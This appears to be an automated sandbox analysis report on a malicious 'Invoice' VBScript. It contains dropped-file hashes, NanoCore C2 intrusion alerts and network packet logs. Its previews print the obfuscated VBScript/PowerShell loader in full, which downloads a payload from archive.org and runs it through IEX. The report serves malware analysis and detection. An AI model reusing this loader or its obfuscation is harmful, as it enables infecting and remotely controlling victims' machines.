                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73
                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73
                                                                          INTERNET-ARCHIVEUSInvoice_#.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.120
                                                                          INVOICE.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.140
                                                                          #WUHD09.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.116
                                                                          Property.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          Invoice.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.120
                                                                          Booking_confirmation.vbsGet hashmaliciousBrowse
                                                                          • 207.241.228.144
                                                                          NCL_Mandatory_Form.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.110
                                                                          HR-Ageing-Report.pptGet hashmaliciousBrowse
                                                                          • 207.241.227.129
                                                                          Reciept_ups.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.123
                                                                          Invoice #20291.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.113
                                                                          45678.vbsGet hashmaliciousBrowse
                                                                          • 207.241.230.172
                                                                          New order (DDV21-0014) TOKYO HIP.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.154
                                                                          SO-19844 EIDCO.ppamGet hashmaliciousBrowse
                                                                          • 207.241.228.150
                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73
                                                                          New Purchase Order-030220.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.145
                                                                          DHL_119040 Beleg.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.145
                                                                          2UUlKfJYJN.exeGet hashmaliciousBrowse
                                                                          • 207.241.224.2
                                                                          Drawing for Our New Order.pptGet hashmaliciousBrowse
                                                                          • 207.241.228.158
                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73
                                                                          IdDetails.ppamGet hashmaliciousBrowse
                                                                          • 207.241.235.73

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          54328bd36c14bd82ddaa0c04b25ed9adInvoice_#.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          RoyalMail_Requestform0729.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          RoyalMail_Requestform1.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          MFS0175, MFS0117 MFS0194.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          INVOICE.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          INQUIRY REQUIREMENTS.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          JUP2A9ptp5.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          7vd7MuxjGd.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          KITCOFiberOptics_CompanyCertifcate.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          LOPEZ CV.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          PO_1994.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          temple.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          transferred $95,934.55 pdf.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          gunzipped.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          Remittance copy.pdf.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          09087900900000000.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          cjfq66QXN5.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          INV. 736392 Scan pdf.exeGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          #WUHD09.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148
                                                                          Property.vbsGet hashmaliciousBrowse
                                                                          • 207.241.227.125
                                                                          • 207.241.228.148

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\Public\Run\Run.vbs
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):908
                                                                          Entropy (8bit):5.494432834103593
                                                                          Encrypted:false
                                                                          SSDEEP:12:PvzC6yh48+XZi8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/s:Pv2H+JitbfAMvAeym6bPiJFxs
                                                                          MD5:C0A8D3A40D4A6B9F6913A04A6F2AE345
                                                                          SHA1:8952D8F47DB152581200B0497B06BD1E9DE9AFCD
                                                                          SHA-256:460AD0D8DA835DCE91DB836BB0BE306FD369EFFEB626CAF543AA299BD4697DA0
                                                                          SHA-512:31CB93334DF71B755DCFE54210DD3EED2C32DE8070561425E2DD495A4934C9EBA2E0A333E3FC8338BA06C444E64ABE967A435139AB90050BB87D4A2859C57E30
                                                                          Malicious:false
                                                                          Preview: Dim FBI..Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://ia801408.us.archive.org/20/items/server_202108/Server.txt';$"..WHO = "B ='E"..ERO = "TH COINt.WTF COINlIOSNT'.Re"..AA = "place('ETH COIN','nE').Repl"..BB = "ace('TF COIN','EbC').Rep"..CC = "lace('OS','e');"..MUSK = "$CC = 'DOS COIN L"&"SOSCOINnG'.Rep"..DD = "lace('S COIN ','Wn').Repl"..FF = "ace('SO','oaD').Rep"..GG = "lace('COIN','TrI');"..SHIB =""..INU ="$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Rep"..KK = "lace('os COIN','X(n`e').Repl"..TT = "ace('BTC COIN','-Ob').Rep"..ENB = "lace('TH COIN','`c`T');"..PUMP ="&('I'+'E"..OS = "X')($A -J"..SOS = "oin '')|&('I'+'E"..EOS = "X');"..COIN = Donal+Trump++mike+pompeo+Elon+WHO+ERO+AA+BB+CC+MUSK+DD+FF+GG+SHIB+INU+KK+TT+ENB+PUMP+OS+SOS+EOS+""..FBI.Run COIN,0..
                                                                          C:\Users\Public\Run\Windows.lnk
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):690
                                                                          Entropy (8bit):3.03893890594732
                                                                          Encrypted:false
                                                                          SSDEEP:12:8gl020sXUd9Cr/YOmuBJrXE+1gGYNQS0qv4t2Y+xIBjK:8mxBJrXE+1fod0ql7aB
                                                                          MD5:B643B57B5474469B70FEC6153C4B2AD8
                                                                          SHA1:AD9974BC091487FBBF2AC38D06B41B848AF4B5B9
                                                                          SHA-256:BA8AC47D1FA2059B60C96DD4C3490E3C946D82CF35C4574DA2C28E0AF6642AEE
                                                                          SHA-512:985F5B9D41770A968B9630DA34B3BD30A95259CF8AF1A73BF77B4F72289435851FCB38CBE48C463047EC7EAEC3003BE189573C8AE8B11AD96A38F5B1D5588F26
                                                                          Malicious:false
                                                                          Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........Public..>............................................P.u.b.l.i.c.....J.1...........Run.8............................................R.u.n.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x.e...........\.W.i.n.d.o.w.s...e.x.e.......................... }.j..L..^6.C.T................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):57895
                                                                          Entropy (8bit):5.080080220298808
                                                                          Encrypted:false
                                                                          SSDEEP:1536:cIu+z30xyJJV3CNBQkj22h4iUxxaVkflJnLvAHPqd+KSS3SOdB8NVzltAHkrNKer:ru+z30IJJV3CNBQkj22qiUxaVkflJnLu
                                                                          MD5:E494C8B04CCA7990028009C5A768629C
                                                                          SHA1:42B21DC378D323E339D49BDC8CD4F96DC5837358
                                                                          SHA-256:AB50EF20F6B7CFF39117E3E89980CDD2FCECBCEDDDE456FECED62FC3AED475BF
                                                                          SHA-512:E06018D7C94E7FFD45407DCBA4282C9F20D4736867AFC8A0EFF016A7AFA8210FB365A8BA3B9FD824C25744C13BA1D6F8390FD88BEFF44EE2C0332BE619A932CB
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE.X...........I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1L.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-SmbBandwidthLimit........Get-SmbClientConfiguration........Get-SmbSession........Get-Sm
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crtkfx14.gxu.psm1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcg2nrvy.g5h.ps1
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1856
                                                                          Entropy (8bit):7.089541637477408
                                                                          Encrypted:false
                                                                          SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
                                                                          MD5:30D23CC577A89146961915B57F408623
                                                                          SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
                                                                          SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
                                                                          SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
                                                                          Malicious:false
                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:+4:+4
                                                                          MD5:78D031F87BA3B82386BA23B6397F97AF
                                                                          SHA1:8B4F4CAF2B6CDD94A28211900B425BDA89999B0C
                                                                          SHA-256:B0F00CABFE6DF9D196E05BB3A8D3563901AB428D4992D5E75D78302292F8C1DC
                                                                          SHA-512:B0950459095DA5E6A3B3493BBEA0FC332DC1252513F405B608F2F8507C10B35D64BC20387B283E2FB9D58FE4B68DF120A3E0CC375CC3A5C69153423C0357F9AE
                                                                          Malicious:true
                                                                          Preview: ...Y.V.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):40
                                                                          Entropy (8bit):5.153055907333276
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                                                                          MD5:4E5E92E2369688041CC82EF9650EDED2
                                                                          SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                                                                          SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                                                                          SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327768
                                                                          Entropy (8bit):7.999367066417797
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
                                                                          MD5:2E52F446105FBF828E63CF808B721F9C
                                                                          SHA1:5330E54F238F46DC04C1AC62B051DB4FCD7416FB
                                                                          SHA-256:2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
                                                                          SHA-512:C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
                                                                          Malicious:false
                                                                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):1054
                                                                          Entropy (8bit):2.926336827490569
                                                                          Encrypted:false
                                                                          SSDEEP:12:8gl0IsXowAOcQ/tz0/CSLwrHj4/3BVwzyDilVBJrXE+1gTCNfBT/v4t2Y+xIBjK:8XLDWLgD4/BUBJrXE+1Vpd7aB
                                                                          MD5:E51CB0EA03B1F2D0835C8E1201DA23CC
                                                                          SHA1:E464C5208721B6CEA60BFB63A3E09B2AEF2E4475
                                                                          SHA-256:26BAAC4EF3C57AEA88EFB7DECCFC5AEE293629144E5B4FA26B46A1E82AFEB6DD
                                                                          SHA-512:D6E0EDB184C0F0D984619205B1F67E3217FFDD502769EAD433FC9EF0C35BE1A0B731F1E92D3C91D11F6CBD262A9331444F46F50E752B3BC53E3AA332866BA3EC
                                                                          Malicious:false
                                                                          Preview: L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........Templates.D............................................T.e.m.p.l.a.t.e.s.....b.2...........Windows.exe.H............................................W.i.n.d.o.w.s...e.x.e...........\.W.i.n.d.o.w.s...e.x.e.............y.............>.e.L.:..er.=y...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.
                                                                          C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4209
                                                                          Entropy (8bit):5.61058983888715
                                                                          Encrypted:false
                                                                          SSDEEP:96:BZkj2NrdrBqDo1ZedrOZ+j2NrdrBqDo1ZO6vyGLGLwE:9JeJGJNvyGLGLwE
                                                                          MD5:707AB5E8985F0E7B8C7673619BF75D31
                                                                          SHA1:8F38465F1288122D7A8216E9B0579EE6B44F1EB6
                                                                          SHA-256:89816FFD2D33B50BA8A2BEEDB617BE308DCD448A85FBB658E715352F0DAA8DFD
                                                                          SHA-512:B53964B5C67C7CCC6E34452A078350ECF240C2B4B254B7E39119A8CAEB958284A69662F1CBEAE26598C31EEFECBF34F3F136AD31480C01520F84945EAD8B0AAB
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt, Author: Joe Security
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210803203913..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');..Process ID: 6756..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..Serializ

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):5.530496672914687
                                                                          TrID:
                                                                            File name:3G1J49A6V_Invoice.vbs
                                                                            File size:913
                                                                            MD5:2da417ae523148f7d65220a2c44d1a0a
                                                                            SHA1:7173fc941d4c051cf4bf5b1eac46aa33f2e6b798
                                                                            SHA256:c3ddf55e53888193522a7b619370b746cb0a79502c5157a98754a9009f644a11
                                                                            SHA512:c96201929f4937e47106f5afc341a548f2f1f90e2a19a3b788836fb33b8bbc300152f4b4892fe00abd75c77f9f61f2c1d1c2d5d686e99dd2e99d799fa4a64721
                                                                            SSDEEP:12:PvUC6yh42bXCOXyE8fyAixHhZyMAHifvAeRoUVzM8NoeT8OobLqhP/v1VJv9Os/V:PvnnbyOXPtbfAMvAeym6bPiJFxV
                                                                            File Content Preview:Dim FBI....Set FBI= CreateObject("WScript.S"&"HELL")..Donal=chr(80) &"O" & Chr(87)..Trump = Chr(69)..mike = Chr(82) & "s"&"H" & Chr(69)..pompeo = Chr(76)..Elon =Chr(76)&" $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$".

                                                                            File Icon

                                                                            Icon Hash:e8d69ece869a9ec4

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            08/03/21-20:41:49.000728TCP2025019ET TROJAN Possible NanoCore C2 60B497766700192.168.2.4185.244.30.23
                                                                            08/03/21-20:41:55.743249TCP2025019ET TROJAN Possible NanoCore C2 60B497776700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:02.846134TCP2025019ET TROJAN Possible NanoCore C2 60B497786700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:09.741092TCP2025019ET TROJAN Possible NanoCore C2 60B497796700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:16.538073TCP2025019ET TROJAN Possible NanoCore C2 60B497806700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:23.610473TCP2025019ET TROJAN Possible NanoCore C2 60B497816700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:30.609821TCP2025019ET TROJAN Possible NanoCore C2 60B497826700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:38.598742TCP2025019ET TROJAN Possible NanoCore C2 60B497836700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:45.767442TCP2025019ET TROJAN Possible NanoCore C2 60B497846700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:52.842480TCP2025019ET TROJAN Possible NanoCore C2 60B497856700192.168.2.4185.244.30.23
                                                                            08/03/21-20:42:59.878034TCP2025019ET TROJAN Possible NanoCore C2 60B497866700192.168.2.4185.244.30.23
                                                                            08/03/21-20:43:06.825128TCP2025019ET TROJAN Possible NanoCore C2 60B497876700192.168.2.4185.244.30.23
                                                                            08/03/21-20:43:13.226201TCP2025019ET TROJAN Possible NanoCore C2 60B497896700192.168.2.4185.244.30.23

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Aug 3, 2021 20:39:15.987169981 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.164120913 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.164302111 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.183140993 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.359813929 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.360070944 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.360095978 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.360121012 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.360138893 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.360169888 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.360205889 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.366322994 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.366348028 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.366415024 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.372102976 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.548307896 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.549798012 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.575921059 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:16.754193068 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.754234076 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.754261017 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.754278898 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:16.754385948 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:17.754581928 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:17.754607916 CEST44349746207.241.227.125192.168.2.4
                                                                            Aug 3, 2021 20:39:17.754766941 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:39.292709112 CEST49746443192.168.2.4207.241.227.125
                                                                            Aug 3, 2021 20:39:39.331945896 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.511606932 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.511773109 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.512151003 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.692389965 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.692430973 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.692523956 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.692553997 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.692573071 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.692619085 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.692653894 CEST49756443192.168.2.4207.241.228.148
                                                                            Aug 3, 2021 20:39:39.694905043 CEST44349756207.241.228.148192.168.2.4
                                                                            Aug 3, 2021 20:39:39.694933891 CEST44349756207.241.228.148192.168.2.4
